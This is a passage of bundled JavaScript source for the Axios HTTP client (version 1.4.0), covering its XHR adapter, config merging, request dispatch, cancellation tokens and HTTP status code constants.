        return parsed.protocol === originURL.protocol && parsed.host === originURL.host;
    };
}() : // Non standard browser envs (web workers, react-native) lack needed support.
function nonStandardBrowserEnv() {
    return function isURLSameOrigin() {
        return true;
    };
}();





"use strict";
function $23607f53e4fda918$export$2e2bcd8739ae039(url) {
    const match = /^([-+\w]{1,25})(:?\/\/|:)/.exec(url);
    return match && match[1] || "";
}




"use strict";
/**
 * Calculate data maxRate
 * @param {Number} [samplesCount= 10]
 * @param {Number} [min= 1000]
 * @returns {Function}
 */ function $4a9d49cd0e6b8acc$var$speedometer(samplesCount, min) {
    samplesCount = samplesCount || 10;
    const bytes = new Array(samplesCount);
    const timestamps = new Array(samplesCount);
    let head = 0;
    let tail = 0;
    let firstSampleTS;
    min = min !== undefined ? min : 1000;
    return function push(chunkLength) {
        const now = Date.now();
        const startedAt = timestamps[tail];
        if (!firstSampleTS) firstSampleTS = now;
        bytes[head] = chunkLength;
        timestamps[head] = now;
        let i = tail;
        let bytesCount = 0;
        while(i !== head){
            bytesCount += bytes[i++];
            i = i % samplesCount;
        }
        head = (head + 1) % samplesCount;
        if (head === tail) tail = (tail + 1) % samplesCount;
        if (now - firstSampleTS < min) return;
        const passed = startedAt && now - startedAt;
        return passed ? Math.round(bytesCount * 1000 / passed) : undefined;
    };
}
var $4a9d49cd0e6b8acc$export$2e2bcd8739ae039 = $4a9d49cd0e6b8acc$var$speedometer;


"use strict";
function $79f0a48d5eb7919b$var$progressEventReducer(listener, isDownloadStream) {
    let bytesNotified = 0;
    const _speedometer = (0, $4a9d49cd0e6b8acc$export$2e2bcd8739ae039)(50, 250);
    return (e)=>{
        const loaded = e.loaded;
        const total = e.lengthComputable ? e.total : undefined;
        const progressBytes = loaded - bytesNotified;
        const rate = _speedometer(progressBytes);
        const inRange = loaded <= total;
        bytesNotified = loaded;
        const data = {
            loaded: loaded,
            total: total,
            progress: total ? loaded / total : undefined,
            bytes: progressBytes,
            rate: rate ? rate : undefined,
            estimated: rate && total && inRange ? (total - loaded) / rate : undefined,
            event: e
        };
        data[isDownloadStream ? "download" : "upload"] = true;
        listener(data);
    };
}
const $79f0a48d5eb7919b$var$isXHRAdapterSupported = typeof XMLHttpRequest !== "undefined";
var $79f0a48d5eb7919b$export$2e2bcd8739ae039 = $79f0a48d5eb7919b$var$isXHRAdapterSupported && function(config) {
    return new Promise(function dispatchXhrRequest(resolve, reject) {
        let requestData = config.data;
        const requestHeaders = (0, $866cce54f6bdfb0c$export$2e2bcd8739ae039).from(config.headers).normalize();
        const responseType = config.responseType;
        let onCanceled;
        function done() {
            if (config.cancelToken) config.cancelToken.unsubscribe(onCanceled);
            if (config.signal) config.signal.removeEventListener("abort", onCanceled);
        }
        if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFormData(requestData)) {
            if ((0, $2f71637df772b183$export$2e2bcd8739ae039).isStandardBrowserEnv || (0, $2f71637df772b183$export$2e2bcd8739ae039).isStandardBrowserWebWorkerEnv) requestHeaders.setContentType(false); // Let the browser set it
            else requestHeaders.setContentType("multipart/form-data;", false); // mobile/desktop app frameworks
        }
        let request = new XMLHttpRequest();
        // HTTP basic authentication
        if (config.auth) {
            const username = config.auth.username || "";
            const password = config.auth.password ? unescape(encodeURIComponent(config.auth.password)) : "";
            requestHeaders.set("Authorization", "Basic " + btoa(username + ":" + password));
        }
        const fullPath = (0, $598acbfafd2c63c5$export$2e2bcd8739ae039)(config.baseURL, config.url);
        request.open(config.method.toUpperCase(), (0, $8df8fedf1c1e4428$export$2e2bcd8739ae039)(fullPath, config.params, config.paramsSerializer), true);
        // Set the request timeout in MS
        request.timeout = config.timeout;
        function onloadend() {
            if (!request) return;
            // Prepare the response
            const responseHeaders = (0, $866cce54f6bdfb0c$export$2e2bcd8739ae039).from("getAllResponseHeaders" in request && request.getAllResponseHeaders());
            const responseData = !responseType || responseType === "text" || responseType === "json" ? request.responseText : request.response;
            const response = {
                data: responseData,
                status: request.status,
                statusText: request.statusText,
                headers: responseHeaders,
                config: config,
                request: request
            };
            (0, $ecb62d5372993dcf$export$2e2bcd8739ae039)(function _resolve(value) {
                resolve(value);
                done();
            }, function _reject(err) {
                reject(err);
                done();
            }, response);
            // Clean up request
            request = null;
        }
        if ("onloadend" in request) // Use onloadend if available
        request.onloadend = onloadend;
        else // Listen for ready state to emulate onloadend
        request.onreadystatechange = function handleLoad() {
            if (!request || request.readyState !== 4) return;
            // The request errored out and we didn't get a response, this will be
            // handled by onerror instead
            // With one exception: request that using file: protocol, most browsers
            // will return status as 0 even though it's a successful request
            if (request.status === 0 && !(request.responseURL && request.responseURL.indexOf("file:") === 0)) return;
            // readystate handler is calling before onerror or ontimeout handlers,
            // so we should call onloadend on the next 'tick'
            setTimeout(onloadend);
        };
        // Handle browser request cancellation (as opposed to a manual cancellation)
        request.onabort = function handleAbort() {
            if (!request) return;
            reject(new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)("Request aborted", (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ECONNABORTED, config, request));
            // Clean up request
            request = null;
        };
        // Handle low level network errors
        request.onerror = function handleError() {
            // Real errors are hidden from us by the browser
            // onerror should only fire if it's a network error
            reject(new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)("Network Error", (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_NETWORK, config, request));
            // Clean up request
            request = null;
        };
        // Handle timeout
        request.ontimeout = function handleTimeout() {
            let timeoutErrorMessage = config.timeout ? "timeout of " + config.timeout + "ms exceeded" : "timeout exceeded";
            const transitional = config.transitional || (0, $51466d41a76e5b4b$export$2e2bcd8739ae039);
            if (config.timeoutErrorMessage) timeoutErrorMessage = config.timeoutErrorMessage;
            reject(new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)(timeoutErrorMessage, transitional.clarifyTimeoutError ? (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ETIMEDOUT : (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ECONNABORTED, config, request));
            // Clean up request
            request = null;
        };
        // Add xsrf header
        // This is only done if running in a standard browser environment.
        // Specifically not if we're in a web worker, or react-native.
        if ((0, $2f71637df772b183$export$2e2bcd8739ae039).isStandardBrowserEnv) {
            // Add xsrf header
            const xsrfValue = (config.withCredentials || (0, $5eb63b558e1fb85a$export$2e2bcd8739ae039)(fullPath)) && config.xsrfCookieName && (0, $65cc14c0704b5541$export$2e2bcd8739ae039).read(config.xsrfCookieName);
            if (xsrfValue) requestHeaders.set(config.xsrfHeaderName, xsrfValue);
        }
        // Remove Content-Type if data is undefined
        requestData === undefined && requestHeaders.setContentType(null);
        // Add headers to the request
        if ("setRequestHeader" in request) (0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach(requestHeaders.toJSON(), function setRequestHeader(val, key) {
            request.setRequestHeader(key, val);
        });
        // Add withCredentials to request if needed
        if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(config.withCredentials)) request.withCredentials = !!config.withCredentials;
        // Add responseType to request if needed
        if (responseType && responseType !== "json") request.responseType = config.responseType;
        // Handle progress if needed
        if (typeof config.onDownloadProgress === "function") request.addEventListener("progress", $79f0a48d5eb7919b$var$progressEventReducer(config.onDownloadProgress, true));
        // Not all browsers support upload events
        if (typeof config.onUploadProgress === "function" && request.upload) request.upload.addEventListener("progress", $79f0a48d5eb7919b$var$progressEventReducer(config.onUploadProgress));
        if (config.cancelToken || config.signal) {
            // Handle cancellation
            // eslint-disable-next-line func-names
            onCanceled = (cancel)=>{
                if (!request) return;
                reject(!cancel || cancel.type ? new (0, $9fd0919e266b4fda$export$2e2bcd8739ae039)(null, config, request) : cancel);
                request.abort();
                request = null;
            };
            config.cancelToken && config.cancelToken.subscribe(onCanceled);
            if (config.signal) config.signal.aborted ? onCanceled() : config.signal.addEventListener("abort", onCanceled);
        }
        const protocol = (0, $23607f53e4fda918$export$2e2bcd8739ae039)(fullPath);
        if (protocol && (0, $2f71637df772b183$export$2e2bcd8739ae039).protocols.indexOf(protocol) === -1) {
            reject(new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)("Unsupported protocol " + protocol + ":", (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_BAD_REQUEST, config));
            return;
        }
        // Send the request
        request.send(requestData || null);
    });
};



const $e8c8c7960873e9ee$var$knownAdapters = {
    http: (0, $4023ac50ad132196$export$2e2bcd8739ae039),
    xhr: (0, $79f0a48d5eb7919b$export$2e2bcd8739ae039)
};
(0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach($e8c8c7960873e9ee$var$knownAdapters, (fn, value)=>{
    if (fn) {
        try {
            Object.defineProperty(fn, "name", {
                value: value
            });
        } catch (e) {
        // eslint-disable-next-line no-empty
        }
        Object.defineProperty(fn, "adapterName", {
            value: value
        });
    }
});
var $e8c8c7960873e9ee$export$2e2bcd8739ae039 = {
    getAdapter: (adapters)=>{
        adapters = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(adapters) ? adapters : [
            adapters
        ];
        const { length: length } = adapters;
        let nameOrAdapter;
        let adapter;
        for(let i = 0; i < length; i++){
            nameOrAdapter = adapters[i];
            if (adapter = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isString(nameOrAdapter) ? $e8c8c7960873e9ee$var$knownAdapters[nameOrAdapter.toLowerCase()] : nameOrAdapter) break;
        }
        if (!adapter) {
            if (adapter === false) throw new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)(`Adapter ${nameOrAdapter} is not supported by the environment`, "ERR_NOT_SUPPORT");
            throw new Error((0, $c319b2c832c2914a$export$2e2bcd8739ae039).hasOwnProp($e8c8c7960873e9ee$var$knownAdapters, nameOrAdapter) ? `Adapter '${nameOrAdapter}' is not available in the build` : `Unknown adapter '${nameOrAdapter}'`);
        }
        if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFunction(adapter)) throw new TypeError("adapter is not a function");
        return adapter;
    },
    adapters: $e8c8c7960873e9ee$var$knownAdapters
};


"use strict";
/**
 * Throws a `CanceledError` if cancellation has been requested.
 *
 * @param {Object} config The config that is to be used for the request
 *
 * @returns {void}
 */ function $9b8d10189805ccc0$var$throwIfCancellationRequested(config) {
    if (config.cancelToken) config.cancelToken.throwIfRequested();
    if (config.signal && config.signal.aborted) throw new (0, $9fd0919e266b4fda$export$2e2bcd8739ae039)(null, config);
}
function $9b8d10189805ccc0$export$2e2bcd8739ae039(config) {
    $9b8d10189805ccc0$var$throwIfCancellationRequested(config);
    config.headers = (0, $866cce54f6bdfb0c$export$2e2bcd8739ae039).from(config.headers);
    // Transform request data
    config.data = (0, $5cf10c777cce5f4f$export$2e2bcd8739ae039).call(config, config.transformRequest);
    if ([
        "post",
        "put",
        "patch"
    ].indexOf(config.method) !== -1) config.headers.setContentType("application/x-www-form-urlencoded", false);
    const adapter = (0, $e8c8c7960873e9ee$export$2e2bcd8739ae039).getAdapter(config.adapter || (0, $843bf0209bc94df8$export$2e2bcd8739ae039).adapter);
    return adapter(config).then(function onAdapterResolution(response) {
        $9b8d10189805ccc0$var$throwIfCancellationRequested(config);
        // Transform response data
        response.data = (0, $5cf10c777cce5f4f$export$2e2bcd8739ae039).call(config, config.transformResponse, response);
        response.headers = (0, $866cce54f6bdfb0c$export$2e2bcd8739ae039).from(response.headers);
        return response;
    }, function onAdapterRejection(reason) {
        if (!(0, $5a60afef8b0dd173$export$2e2bcd8739ae039)(reason)) {
            $9b8d10189805ccc0$var$throwIfCancellationRequested(config);
            // Transform response data
            if (reason && reason.response) {
                reason.response.data = (0, $5cf10c777cce5f4f$export$2e2bcd8739ae039).call(config, config.transformResponse, reason.response);
                reason.response.headers = (0, $866cce54f6bdfb0c$export$2e2bcd8739ae039).from(reason.response.headers);
            }
        }
        return Promise.reject(reason);
    });
}




"use strict";
const $f85fda54cd977b19$var$headersToObject = (thing)=>thing instanceof (0, $866cce54f6bdfb0c$export$2e2bcd8739ae039) ? thing.toJSON() : thing;
function $f85fda54cd977b19$export$2e2bcd8739ae039(config1, config2) {
    // eslint-disable-next-line no-param-reassign
    config2 = config2 || {};
    const config = {};
    function getMergedValue(target, source, caseless) {
        if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isPlainObject(target) && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isPlainObject(source)) return (0, $c319b2c832c2914a$export$2e2bcd8739ae039).merge.call({
            caseless: caseless
        }, target, source);
        else if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isPlainObject(source)) return (0, $c319b2c832c2914a$export$2e2bcd8739ae039).merge({}, source);
        else if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(source)) return source.slice();
        return source;
    }
    // eslint-disable-next-line consistent-return
    function mergeDeepProperties(a, b, caseless) {
        if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(b)) return getMergedValue(a, b, caseless);
        else if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(a)) return getMergedValue(undefined, a, caseless);
    }
    // eslint-disable-next-line consistent-return
    function valueFromConfig2(a, b) {
        if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(b)) return getMergedValue(undefined, b);
    }
    // eslint-disable-next-line consistent-return
    function defaultToConfig2(a, b) {
        if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(b)) return getMergedValue(undefined, b);
        else if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(a)) return getMergedValue(undefined, a);
    }
    // eslint-disable-next-line consistent-return
    function mergeDirectKeys(a, b, prop) {
        if (prop in config2) return getMergedValue(a, b);
        else if (prop in config1) return getMergedValue(undefined, a);
    }
    const mergeMap = {
        url: valueFromConfig2,
        method: valueFromConfig2,
        data: valueFromConfig2,
        baseURL: defaultToConfig2,
        transformRequest: defaultToConfig2,
        transformResponse: defaultToConfig2,
        paramsSerializer: defaultToConfig2,
        timeout: defaultToConfig2,
        timeoutMessage: defaultToConfig2,
        withCredentials: defaultToConfig2,
        adapter: defaultToConfig2,
        responseType: defaultToConfig2,
        xsrfCookieName: defaultToConfig2,
        xsrfHeaderName: defaultToConfig2,
        onUploadProgress: defaultToConfig2,
        onDownloadProgress: defaultToConfig2,
        decompress: defaultToConfig2,
        maxContentLength: defaultToConfig2,
        maxBodyLength: defaultToConfig2,
        beforeRedirect: defaultToConfig2,
        transport: defaultToConfig2,
        httpAgent: defaultToConfig2,
        httpsAgent: defaultToConfig2,
        cancelToken: defaultToConfig2,
        socketPath: defaultToConfig2,
        responseEncoding: defaultToConfig2,
        validateStatus: mergeDirectKeys,
        headers: (a, b)=>mergeDeepProperties($f85fda54cd977b19$var$headersToObject(a), $f85fda54cd977b19$var$headersToObject(b), true)
    };
    (0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach(Object.keys(Object.assign({}, config1, config2)), function computeConfigValue(prop) {
        const merge = mergeMap[prop] || mergeDeepProperties;
        const configValue = merge(config1[prop], config2[prop], prop);
        (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(configValue) && merge !== mergeDirectKeys || (config[prop] = configValue);
    });
    return config;
}



const $23ff3f1a5c7912d5$export$a4ad2735b021c132 = "1.4.0";



"use strict";
const $85f59389941e7907$var$validators = {};
// eslint-disable-next-line func-names
[
    "object",
    "boolean",
    "number",
    "function",
    "string",
    "symbol"
].forEach((type, i)=>{
    $85f59389941e7907$var$validators[type] = function validator(thing) {
        return typeof thing === type || "a" + (i < 1 ? "n " : " ") + type;
    };
});
const $85f59389941e7907$var$deprecatedWarnings = {};
/**
 * Transitional option validator
 *
 * @param {function|boolean?} validator - set to false if the transitional option has been removed
 * @param {string?} version - deprecated version / removed since version
 * @param {string?} message - some message with additional info
 *
 * @returns {function}
 */ $85f59389941e7907$var$validators.transitional = function transitional(validator, version, message) {
    function formatMessage(opt, desc) {
        return "[Axios v" + (0, $23ff3f1a5c7912d5$export$a4ad2735b021c132) + "] Transitional option '" + opt + "'" + desc + (message ? ". " + message : "");
    }
    // eslint-disable-next-line func-names
    return (value, opt, opts)=>{
        if (validator === false) throw new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)(formatMessage(opt, " has been removed" + (version ? " in " + version : "")), (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_DEPRECATED);
        if (version && !$85f59389941e7907$var$deprecatedWarnings[opt]) {
            $85f59389941e7907$var$deprecatedWarnings[opt] = true;
            // eslint-disable-next-line no-console
            console.warn(formatMessage(opt, " has been deprecated since v" + version + " and will be removed in the near future"));
        }
        return validator ? validator(value, opt, opts) : true;
    };
};
/**
 * Assert object's properties type
 *
 * @param {object} options
 * @param {object} schema
 * @param {boolean?} allowUnknown
 *
 * @returns {object}
 */ function $85f59389941e7907$var$assertOptions(options, schema, allowUnknown) {
    if (typeof options !== "object") throw new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)("options must be an object", (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_BAD_OPTION_VALUE);
    const keys = Object.keys(options);
    let i = keys.length;
    while(i-- > 0){
        const opt = keys[i];
        const validator = schema[opt];
        if (validator) {
            const value = options[opt];
            const result = value === undefined || validator(value, opt, options);
            if (result !== true) throw new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)("option " + opt + " must be " + result, (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_BAD_OPTION_VALUE);
            continue;
        }
        if (allowUnknown !== true) throw new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)("Unknown option " + opt, (0, $4e2395edb77acf3a$export$2e2bcd8739ae039).ERR_BAD_OPTION);
    }
}
var $85f59389941e7907$export$2e2bcd8739ae039 = {
    assertOptions: $85f59389941e7907$var$assertOptions,
    validators: $85f59389941e7907$var$validators
};



"use strict";
const $a93486d2307f31c3$var$validators = (0, $85f59389941e7907$export$2e2bcd8739ae039).validators;
/**
 * Create a new instance of Axios
 *
 * @param {Object} instanceConfig The default config for the instance
 *
 * @return {Axios} A new instance of Axios
 */ class $a93486d2307f31c3$var$Axios {
    constructor(instanceConfig){
        this.defaults = instanceConfig;
        this.interceptors = {
            request: new (0, $5de878cd737ef277$export$2e2bcd8739ae039)(),
            response: new (0, $5de878cd737ef277$export$2e2bcd8739ae039)()
        };
    }
    /**
   * Dispatch a request
   *
   * @param {String|Object} configOrUrl The config specific for this request (merged with this.defaults)
   * @param {?Object} config
   *
   * @returns {Promise} The Promise to be fulfilled
   */ request(configOrUrl, config) {
        /*eslint no-param-reassign:0*/ // Allow for axios('example/url'[, config]) a la fetch API
        if (typeof configOrUrl === "string") {
            config = config || {};
            config.url = configOrUrl;
        } else config = configOrUrl || {};
        config = (0, $f85fda54cd977b19$export$2e2bcd8739ae039)(this.defaults, config);
        const { transitional: transitional, paramsSerializer: paramsSerializer, headers: headers } = config;
        if (transitional !== undefined) (0, $85f59389941e7907$export$2e2bcd8739ae039).assertOptions(transitional, {
            silentJSONParsing: $a93486d2307f31c3$var$validators.transitional($a93486d2307f31c3$var$validators.boolean),
            forcedJSONParsing: $a93486d2307f31c3$var$validators.transitional($a93486d2307f31c3$var$validators.boolean),
            clarifyTimeoutError: $a93486d2307f31c3$var$validators.transitional($a93486d2307f31c3$var$validators.boolean)
        }, false);
        if (paramsSerializer != null) {
            if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFunction(paramsSerializer)) config.paramsSerializer = {
                serialize: paramsSerializer
            };
            else (0, $85f59389941e7907$export$2e2bcd8739ae039).assertOptions(paramsSerializer, {
                encode: $a93486d2307f31c3$var$validators.function,
                serialize: $a93486d2307f31c3$var$validators.function
            }, true);
        }
        // Set config.method
        config.method = (config.method || this.defaults.method || "get").toLowerCase();
        let contextHeaders;
        // Flatten headers
        contextHeaders = headers && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).merge(headers.common, headers[config.method]);
        contextHeaders && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach([
            "delete",
            "get",
            "head",
            "post",
            "put",
            "patch",
            "common"
        ], (method)=>{
            delete headers[method];
        });
        config.headers = (0, $866cce54f6bdfb0c$export$2e2bcd8739ae039).concat(contextHeaders, headers);
        // filter out skipped interceptors
        const requestInterceptorChain = [];
        let synchronousRequestInterceptors = true;
        this.interceptors.request.forEach(function unshiftRequestInterceptors(interceptor) {
            if (typeof interceptor.runWhen === "function" && interceptor.runWhen(config) === false) return;
            synchronousRequestInterceptors = synchronousRequestInterceptors && interceptor.synchronous;
            requestInterceptorChain.unshift(interceptor.fulfilled, interceptor.rejected);
        });
        const responseInterceptorChain = [];
        this.interceptors.response.forEach(function pushResponseInterceptors(interceptor) {
            responseInterceptorChain.push(interceptor.fulfilled, interceptor.rejected);
        });
        let promise;
        let i = 0;
        let len;
        if (!synchronousRequestInterceptors) {
            const chain = [
                (0, $9b8d10189805ccc0$export$2e2bcd8739ae039).bind(this),
                undefined
            ];
            chain.unshift.apply(chain, requestInterceptorChain);
            chain.push.apply(chain, responseInterceptorChain);
            len = chain.length;
            promise = Promise.resolve(config);
            while(i < len)promise = promise.then(chain[i++], chain[i++]);
            return promise;
        }
        len = requestInterceptorChain.length;
        let newConfig = config;
        i = 0;
        while(i < len){
            const onFulfilled = requestInterceptorChain[i++];
            const onRejected = requestInterceptorChain[i++];
            try {
                newConfig = onFulfilled(newConfig);
            } catch (error) {
                onRejected.call(this, error);
                break;
            }
        }
        try {
            promise = (0, $9b8d10189805ccc0$export$2e2bcd8739ae039).call(this, newConfig);
        } catch (error) {
            return Promise.reject(error);
        }
        i = 0;
        len = responseInterceptorChain.length;
        while(i < len)promise = promise.then(responseInterceptorChain[i++], responseInterceptorChain[i++]);
        return promise;
    }
    getUri(config) {
        config = (0, $f85fda54cd977b19$export$2e2bcd8739ae039)(this.defaults, config);
        const fullPath = (0, $598acbfafd2c63c5$export$2e2bcd8739ae039)(config.baseURL, config.url);
        return (0, $8df8fedf1c1e4428$export$2e2bcd8739ae039)(fullPath, config.params, config.paramsSerializer);
    }
}
// Provide aliases for supported request methods
(0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach([
    "delete",
    "get",
    "head",
    "options"
], function forEachMethodNoData(method) {
    /*eslint func-names:0*/ $a93486d2307f31c3$var$Axios.prototype[method] = function(url, config) {
        return this.request((0, $f85fda54cd977b19$export$2e2bcd8739ae039)(config || {}, {
            method: method,
            url: url,
            data: (config || {}).data
        }));
    };
});
(0, $c319b2c832c2914a$export$2e2bcd8739ae039).forEach([
    "post",
    "put",
    "patch"
], function forEachMethodWithData(method) {
    /*eslint func-names:0*/ function generateHTTPMethod(isForm) {
        return function httpMethod(url, data, config) {
            return this.request((0, $f85fda54cd977b19$export$2e2bcd8739ae039)(config || {}, {
                method: method,
                headers: isForm ? {
                    "Content-Type": "multipart/form-data"
                } : {},
                url: url,
                data: data
            }));
        };
    }
    $a93486d2307f31c3$var$Axios.prototype[method] = generateHTTPMethod();
    $a93486d2307f31c3$var$Axios.prototype[method + "Form"] = generateHTTPMethod(true);
});
var $a93486d2307f31c3$export$2e2bcd8739ae039 = $a93486d2307f31c3$var$Axios;







"use strict";
/**
 * A `CancelToken` is an object that can be used to request cancellation of an operation.
 *
 * @param {Function} executor The executor function.
 *
 * @returns {CancelToken}
 */ class $fb81495929d8a282$var$CancelToken {
    constructor(executor){
        if (typeof executor !== "function") throw new TypeError("executor must be a function.");
        let resolvePromise;
        this.promise = new Promise(function promiseExecutor(resolve) {
            resolvePromise = resolve;
        });
        const token = this;
        // eslint-disable-next-line func-names
        this.promise.then((cancel)=>{
            if (!token._listeners) return;
            let i = token._listeners.length;
            while(i-- > 0)token._listeners[i](cancel);
            token._listeners = null;
        });
        // eslint-disable-next-line func-names
        this.promise.then = (onfulfilled)=>{
            let _resolve;
            // eslint-disable-next-line func-names
            const promise = new Promise((resolve)=>{
                token.subscribe(resolve);
                _resolve = resolve;
            }).then(onfulfilled);
            promise.cancel = function reject() {
                token.unsubscribe(_resolve);
            };
            return promise;
        };
        executor(function cancel(message, config, request) {
            if (token.reason) // Cancellation has already been requested
            return;
            token.reason = new (0, $9fd0919e266b4fda$export$2e2bcd8739ae039)(message, config, request);
            resolvePromise(token.reason);
        });
    }
    /**
   * Throws a `CanceledError` if cancellation has been requested.
   */ throwIfRequested() {
        if (this.reason) throw this.reason;
    }
    /**
   * Subscribe to the cancel signal
   */ subscribe(listener) {
        if (this.reason) {
            listener(this.reason);
            return;
        }
        if (this._listeners) this._listeners.push(listener);
        else this._listeners = [
            listener
        ];
    }
    /**
   * Unsubscribe from the cancel signal
   */ unsubscribe(listener) {
        if (!this._listeners) return;
        const index = this._listeners.indexOf(listener);
        if (index !== -1) this._listeners.splice(index, 1);
    }
    /**
   * Returns an object that contains a new `CancelToken` and a function that, when called,
   * cancels the `CancelToken`.
   */ static source() {
        let cancel;
        const token = new $fb81495929d8a282$var$CancelToken(function executor(c) {
            cancel = c;
        });
        return {
            token: token,
            cancel: cancel
        };
    }
}
var $fb81495929d8a282$export$2e2bcd8739ae039 = $fb81495929d8a282$var$CancelToken;






"use strict";
function $089369673aa7c1c3$export$2e2bcd8739ae039(callback) {
    return function wrap(arr) {
        return callback.apply(null, arr);
    };
}



"use strict";
function $9db8da59db12cd94$export$2e2bcd8739ae039(payload) {
    return (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isObject(payload) && payload.isAxiosError === true;
}



const $f919374d785e9fb8$var$HttpStatusCode = {
    Continue: 100,
    SwitchingProtocols: 101,
    Processing: 102,
    EarlyHints: 103,
    Ok: 200,
    Created: 201,
    Accepted: 202,
    NonAuthoritativeInformation: 203,
    NoContent: 204,
    ResetContent: 205,
    PartialContent: 206,
    MultiStatus: 207,
    AlreadyReported: 208,
    ImUsed: 226,
    MultipleChoices: 300,
    MovedPermanently: 301,
    Found: 302,
    SeeOther: 303,
    NotModified: 304,
    UseProxy: 305,
    Unused: 306,
    TemporaryRedirect: 307,
    PermanentRedirect: 308,
    BadRequest: 400,
    Unauthorized: 401,
    PaymentRequired: 402,
    Forbidden: 403,
    NotFound: 404,
    MethodNotAllowed: 405,
    NotAcceptable: 406,
    ProxyAuthenticationRequired: 407,
    RequestTimeout: 408,
    Conflict: 409,
    Gone: 410,
    LengthRequired: 411,
    PreconditionFailed: 412,
    PayloadTooLarge: 413,
    UriTooLong: 414,
    UnsupportedMediaType: 415,
    RangeNotSatisfiable: 416,
    ExpectationFailed: 417,
    ImATeapot: 418,
    MisdirectedRequest: 421,
    UnprocessableEntity: 422,
    Locked: 423,
    FailedDependency: 424,
    TooEarly: 425,
    UpgradeRequired: 426,
    PreconditionRequired: 428,
    TooManyRequests: 429,
    RequestHeaderFieldsTooLarge: 431,
    UnavailableForLegalReasons: 451,
    InternalServerError: 500,
    NotImplemented: 501,
    BadGateway: 502,
    ServiceUnavailable: 503,
    GatewayTimeout: 504,
    HttpVersionNotSupported: 505,
    VariantAlsoNegotiates: 506,
    InsufficientStorage: 507,
    LoopDetected: 508,
    NotExtended: 510,
    NetworkAuthenticationRequired: 511
};
Object.entries($f919374d785e9fb8$var$HttpStatusCode).forEach(([key, value])=>{
    $f919374d785e9fb8$var$HttpStatusCode[value] = key;
});
var $f919374d785e9fb8$export$2e2bcd8739ae039 = $f919374d785e9fb8$var$HttpStatusCode;


"use strict";
/**
 * Create an instance of Axios
 *
 * @param {Object} defaultConfig The default config for the instance
 *
 * @returns {Axios} A new instance of Axios
 */ function $57966c7e0affc4cb$var$createInstance(defaultConfig) {
    const context = new (0, $a93486d2307f31c3$export$2e2bcd8739ae039)(defaultConfig);
    const instance = (0, $e5cb5cefd6507f7e$export$2e2bcd8739ae039)((0, $a93486d2307f31c3$export$2e2bcd8739ae039).prototype.request, context);
    // Copy axios.prototype to instance
    (0, $c319b2c832c2914a$export$2e2bcd8739ae039).extend(instance, (0, $a93486d2307f31c3$export$2e2bcd8739ae039).prototype, context, {
        allOwnKeys: true
    });
    // Copy context to instance
    (0, $c319b2c832c2914a$export$2e2bcd8739ae039).extend(instance, context, null, {
        allOwnKeys: true
    });
    // Factory for creating new instances
    instance.create = function create(instanceConfig) {
        return $57966c7e0affc4cb$var$createInstance((0, $f85fda54cd977b19$export$2e2bcd8739ae039)(defaultConfig, instanceConfig));
    };
    return instance;
}
// Create the default instance to be exported
const $57966c7e0affc4cb$var$axios = $57966c7e0affc4cb$var$createInstance((0, $843bf0209bc94df8$export$2e2bcd8739ae039));
// Expose Axios class to allow class inheritance
$57966c7e0affc4cb$var$axios.Axios = (0, $a93486d2307f31c3$export$2e2bcd8739ae039);
// Expose Cancel & CancelToken
$57966c7e0affc4cb$var$axios.CanceledError = (0, $9fd0919e266b4fda$export$2e2bcd8739ae039);
$57966c7e0affc4cb$var$axios.CancelToken = (0, $fb81495929d8a282$export$2e2bcd8739ae039);
$57966c7e0affc4cb$var$axios.isCancel = (0, $5a60afef8b0dd173$export$2e2bcd8739ae039);
$57966c7e0affc4cb$var$axios.VERSION = (0, $23ff3f1a5c7912d5$export$a4ad2735b021c132);
$57966c7e0affc4cb$var$axios.toFormData = (0, $e6cbd383b18c9625$export$2e2bcd8739ae039);
// Expose AxiosError class
$57966c7e0affc4cb$var$axios.AxiosError = (0, $4e2395edb77acf3a$export$2e2bcd8739ae039);
// alias for CanceledError for backward compatibility
$57966c7e0affc4cb$var$axios.Cancel = $57966c7e0affc4cb$var$axios.CanceledError;
// Expose all/spread
$57966c7e0affc4cb$var$axios.all = function all(promises) {
    return Promise.all(promises);
};
$57966c7e0affc4cb$var$axios.spread = (0, $089369673aa7c1c3$export$2e2bcd8739ae039);
// Expose isAxiosError
$57966c7e0affc4cb$var$axios.isAxiosError = (0, $9db8da59db12cd94$export$2e2bcd8739ae039);
